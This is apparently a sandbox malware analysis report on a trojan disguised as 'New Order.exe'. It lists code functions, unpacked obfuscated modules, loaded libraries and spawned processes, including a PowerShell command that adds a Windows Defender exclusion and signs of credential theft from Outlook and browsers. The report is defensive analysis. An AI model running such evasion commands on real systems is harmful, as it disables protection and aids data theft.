                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033B70C014_2_033B70C0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0346F7B014_2_0346F7B0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_034616CC14_2_034616CC
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0346757114_2_03467571
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0344D5B014_2_0344D5B0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033A146014_2_033A1460
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0346F43F14_2_0346F43F
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0346FB7614_2_0346FB76
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_03425BF014_2_03425BF0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033CFB8014_2_033CFB80
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033EDBF914_2_033EDBF9
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_03467A4614_2_03467A46
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0346FA4914_2_0346FA49
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_03423A6C14_2_03423A6C
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0345DAC614_2_0345DAC6
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033F5AA014_2_033F5AA0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_03451AA314_2_03451AA3
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0344DAAC14_2_0344DAAC
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0344591014_2_03445910
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033B995014_2_033B9950
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033CB95014_2_033CB950
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0341D80014_2_0341D800
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033B38E014_2_033B38E0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0346FF0914_2_0346FF09
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033B1F9214_2_033B1F92
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0346FFB114_2_0346FFB1
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033B9EB014_2_033B9EB0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_03461D5A14_2_03461D5A
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_03467D7314_2_03467D73
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033B3D4014_2_033B3D40
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033CFDC014_2_033CFDC0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_03429C3214_2_03429C32
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0346FCF214_2_0346FCF2
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_009624D014_2_009624D0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0097C39014_2_0097C390
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0095D37014_2_0095D370
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0095D36914_2_0095D369
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0095D59014_2_0095D590
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0095B57014_2_0095B570
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0095B6B414_2_0095B6B4
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0095B6C014_2_0095B6C0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_00965BC014_2_00965BC0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_00963DBB14_2_00963DBB
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_00963DC014_2_00963DC0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0328E3E814_2_0328E3E8
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0328E50314_2_0328E503
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0328D96814_2_0328D968
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0328E89C14_2_0328E89C
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: String function: 0339B970 appears 280 times
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: String function: 033E5130 appears 58 times
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: String function: 0342F290 appears 105 times
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: String function: 033F7E54 appears 102 times
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: String function: 0341EA12 appears 86 times
                Source: C:\Users\user\Desktop\New Order.exeCode function: String function: 0188F290 appears 105 times
                Source: C:\Users\user\Desktop\New Order.exeCode function: String function: 01857E54 appears 102 times
                Source: C:\Users\user\Desktop\New Order.exeCode function: String function: 017FB970 appears 280 times
                Source: C:\Users\user\Desktop\New Order.exeCode function: String function: 0187EA12 appears 86 times
                Source: C:\Users\user\Desktop\New Order.exeCode function: String function: 01845130 appears 58 times
                Source: New Order.exe, 00000001.00000002.2168677711.0000000002F72000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs New Order.exe
                Source: New Order.exe, 00000001.00000002.2182298168.0000000007400000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs New Order.exe
                Source: New Order.exe, 00000001.00000000.2152803183.0000000000BD8000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameTWXA.exe0 vs New Order.exe
                Source: New Order.exe, 00000001.00000002.2167988143.00000000011EE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs New Order.exe
                Source: New Order.exe, 00000001.00000002.2181124789.00000000059B0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs New Order.exe
                Source: New Order.exe, 00000001.00000002.2181175394.00000000059D0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePowerShell.EXEj% vs New Order.exe
                Source: New Order.exe, 00000008.00000002.2489535674.00000000018FD000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs New Order.exe
                Source: New Order.exe, 00000008.00000002.2488836600.0000000001367000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamew32time.dllj% vs New Order.exe
                Source: New Order.exe | Binary or memory string: OriginalFilenameTWXA.exe0 vs New Order.exe
                Source: New Order.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: New Order.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, M7cDBeDIldQIV71LRd.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, M7cDBeDIldQIV71LRd.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, M7cDBeDIldQIV71LRd.cs | Security API names: _0020.AddAccessRule
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, KXOu74t9GvIK3VBWFs.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, M7cDBeDIldQIV71LRd.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, M7cDBeDIldQIV71LRd.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, M7cDBeDIldQIV71LRd.cs | Security API names: _0020.AddAccessRule
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, KXOu74t9GvIK3VBWFs.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@12/7@20/13
                Source: C:\Users\user\Desktop\New Order.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\New Order.exe.log
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7172:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pfobkdz1.5zi.ps1
                Source: New Order.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\New Order.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\New Order.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: w32tm.exe, 0000000E.00000003.2689823843.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000003.2687510954.0000000000A69000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4631373048.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000003.2687377394.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4631373048.0000000000A69000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: New Order.exe | ReversingLabs: Detection: 57%
                Source: unknown | Process created: C:\Users\user\Desktop\New Order.exe "C:\Users\user\Desktop\New Order.exe"
                Source: C:\Users\user\Desktop\New Order.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe"
                Source: C:\Users\user\Desktop\New Order.exe | Process created: C:\Users\user\Desktop\New Order.exe "C:\Users\user\Desktop\New Order.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\New Order.exe | Process created: C:\Users\user\Desktop\New Order.exe "C:\Users\user\Desktop\New Order.exe"
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe | Process created: C:\Windows\SysWOW64\w32tm.exe "C:\Windows\SysWOW64\w32tm.exe"
                Source: C:\Windows\SysWOW64\w32tm.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: iconcodecservice.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: propsys.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: edputil.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: wintypes.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: appresolver.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: bcp47langs.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: slc.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: sppc.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\Desktop\New Order.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\w32tm.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\w32tm.exe | Section loaded: logoncli.dll
                Source: C:\Windows\SysWOW64\w32tm.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\w32tm.exe | Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\w32tm.exe | Section loaded: ntdsapi.dll
                Source: C:\Windows\SysWOW64\w32tm.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\w32tm.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\w32tm.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\w32tm.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\w32tm.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\w32tm.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\w32tm.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\w32tm.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\w32tm.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\w32tm.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\w32tm.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\w32tm.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\w32tm.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\w32tm.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\w32tm.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\w32tm.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\w32tm.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\w32tm.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\w32tm.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\w32tm.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\w32tm.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\w32tm.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\New Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\New Order.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: New Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: New Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: w32tm.pdb source: New Order.exe, 00000008.00000002.2488836600.0000000001367000.00000004.00000020.00020000.00000000.sdmp, XVZmwHdSYwx.exe, 0000000D.00000002.4633149087.0000000000928000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XVZmwHdSYwx.exe, 0000000D.00000002.4632680489.000000000075E000.00000002.00000001.01000000.0000000C.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4628553874.000000000075E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: New Order.exe, 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000003.2484890220.0000000003007000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000003.2491039290.00000000031BB000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: New Order.exe, New Order.exe, 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, w32tm.exe, w32tm.exe, 0000000E.00000003.2484890220.0000000003007000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000003.2491039290.00000000031BB000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: w32tm.pdbGCTL source: New Order.exe, 00000008.00000002.2488836600.0000000001367000.00000004.00000020.00020000.00000000.sdmp, XVZmwHdSYwx.exe, 0000000D.00000002.4633149087.0000000000928000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: 1.2.New Order.exe.4006340.0.raw.unpack, M7cDBeDIldQIV71LRd.cs.Net Code: WmEujLLlvB System.Reflection.Assembly.Load(byte[])
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, M7cDBeDIldQIV71LRd.cs.Net Code: WmEujLLlvB System.Reflection.Assembly.Load(byte[])
                Source: 1.2.New Order.exe.59b0000.3.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\New Order.exeCode function: 1_2_02D9EE60 push esp; iretd 1_2_02D9EE61
                Source: C:\Users\user\Desktop\New Order.exeCode function: 1_2_060BF8DC pushad ; iretd 1_2_060BF8DD
                Source: C:\Users\user\Desktop\New Order.exeCode function: 1_2_074A8EF3 push edi; ret 1_2_074A8EFB
                Source: C:\Users\user\Desktop\New Order.exeCode function: 1_2_074A05C8 pushfd ; retf 1_2_074A05D5
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0040C0BE push esi; iretd 8_2_0040C0BF
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_00403150 push eax; ret 8_2_00403152
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_004071C5 push 064DD826h; ret 8_2_00407218
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_004151E5 push ebp; retf 8_2_004151E6
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0040719F push 064DD826h; ret 8_2_00407218
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0040721A push 064DD826h; ret 8_2_00407218
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0040DB92 pushfd ; retf 8_2_0040DB95
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_00418C64 push ebx; iretd 8_2_00418CBB
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_004185B8 push ecx; iretd 8_2_004185B9
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018009AD push ecx; mov dword ptr [esp], ecx 8_2_018009B6
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033A09AD push ecx; mov dword ptr [esp], ecx 14_2_033A09B6
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_00962092 push ebp; retf 14_2_00962093
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_009720AD push esp; retf 14_2_009720BF
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_009540C7 push 064DD826h; ret 14_2_009540C5
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0095404C push 064DD826h; ret 14_2_009540C5
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_00954072 push 064DD826h; ret 14_2_009540C5
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_00958F6B push esi; iretd 14_2_00958F6C
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_009715CE push BF7A2FD7h; iretd 14_2_009715DE
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_009715EF push BF7A2FD7h; iretd 14_2_009715DE
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_00965B11 push ebx; iretd 14_2_00965B68
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0328D368 push C843D3C6h; retf 14_2_0328D373
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0328D2E0 pushad ; iretd 14_2_0328D2E1
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_032861BE push edx; ret 14_2_032861C9
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0328D711 push cs; iretd 14_2_0328D712
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0328F582 push esi; iretd 14_2_0328F653
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0328F5FE push esi; iretd 14_2_0328F653
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0328BB3B pushfd ; retf 14_2_0328BB1C
                Source: New Order.exeStatic PE information: section name: .text entropy: 7.814379411138541
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, XcFZQ5Wb4jiCmTJ1Nt.csHigh entropy of concatenated method names: 'uKsk4lQj3M', 'PeEkV3mXtX', 'pDwkYm4cHs', 'd5XYTDMMNi', 'GOEYzBWdvf', 'ebckO2rNEn', 'h3YkHQxait', 'qTNk2y22RS', 'C2mkxLdr3d', 'uJSkuB6wiP'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, kPwJ44nc3J1leqjaPO.csHigh entropy of concatenated method names: 'ylJSpnZueR', 'M4QSEUrE51', 'O5NSFKa8QW', 'wKNSim7WC0', 'p1RSyRBumo', 'zKsSCcswEO', 'gJKSWQtYZR', 'wUHSakDYcB', 'blJSUMQrSf', 'glvSoX3mV6'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, KXOu74t9GvIK3VBWFs.csHigh entropy of concatenated method names: 'ebUNmb8pH1', 'vdWNcxqhRR', 'C2MN06w06o', 'sONNKa9xC0', 'MumN1RLuq7', 'B4wN9gbtus', 'n1YNfRCirg', 'z4FN38kRlg', 'rBdNnZTd2h', 'zUZNT0gIa2'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, ucqiXrfx0Syni9p3OA.csHigh entropy of concatenated method names: 'xj7SIwEh7I', 'KP2ShtRn4I', 'f4ZSSjPUSM', 'BJWSXZVnYw', 'IxTS6LZAxg', 'cjMSP2ecGi', 'Dispose', 'Tqxr4Js272', 'LLwrN3I7Lk', 'hArrVMTLSc'
